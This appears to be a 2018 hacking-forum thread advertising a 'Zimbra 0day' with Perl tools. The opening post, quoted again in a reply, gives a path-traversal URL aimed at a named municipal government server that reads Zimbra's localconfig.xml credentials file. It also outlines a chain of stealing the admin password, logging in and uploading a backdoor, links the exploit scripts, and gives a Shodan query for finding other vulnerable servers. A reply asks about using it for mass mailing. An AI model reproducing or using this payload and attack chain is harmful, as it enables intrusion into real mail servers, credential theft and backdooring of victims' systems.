Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
WebMailer Zimbra 0day + Tools (Perl)
#1
Thumbsup 
[Image: q0UwTjjH_400x400.jpg]


Test:

https://ncs.norwoodma.gov:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214%E2%80%8B175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml


Protocol:

(Perl Script Execution = Insertar Target = Config Administrator Password Explotation = Login = Backdoor Upload)

Scripts:

https://github.com/nulsec/zimbra-0day

Shodan Search:

https://www.shodan.io/search?query=port%3A7071+title%3Azimbra+

Ready..




Ban reason: Carding is against the rules. (Permanent)
Reply
#2
(03-04-2018, 12:10 AM)securityteam Wrote:  [Image: q0UwTjjH_400x400.jpg]


Test:

https://ncs.norwoodma.gov:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214%E2%80%8B175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml


Protocol:

(Perl Script Execution = Insertar Target = Config Administrator Password Explotation = Login = Backdoor Upload)

Scripts:

https://github.com/nulsec/zimbra-0day

Shodan Search:

https://www.shodan.io/search?query=port%3A7071+title%3Azimbra+

Ready..





SO this exploit will get you into mass mailing and other web mail servers ?
Reply
#3
this is not the same as https://0day.today/exploit/description/29490 who seems to be a CSRF dont?
Reply
 


Possibly Related Threads...
Thread Author Replies Views Last Post
  Mega Pack Cracking Tools By Stefy 2017 Atoshi 3 872 05-26-2018, 11:37 PM
Last Post: MoneyWasted
  0day WP Plugin Post Start Rating SQli Injection By KelvinSecTeam securityteam 4 441 05-22-2018, 04:27 PM
Last Post: TantaNata
Lightning Spy Whatsapp Kit tools teamkelvinsecteam 3 302 05-11-2018, 12:55 PM
Last Post: rheek
  Hackpack with 62 tools hacker022 1 160 05-07-2018, 08:51 AM
Last Post: That1GuyAtThat1Place
  Ultimate Guide to Becoming a Cracker - Includes Tools and an indepth Description flatus 7 469 05-02-2018, 06:10 PM
Last Post: TantaNata



Users browsing this thread: 1 Guest(s)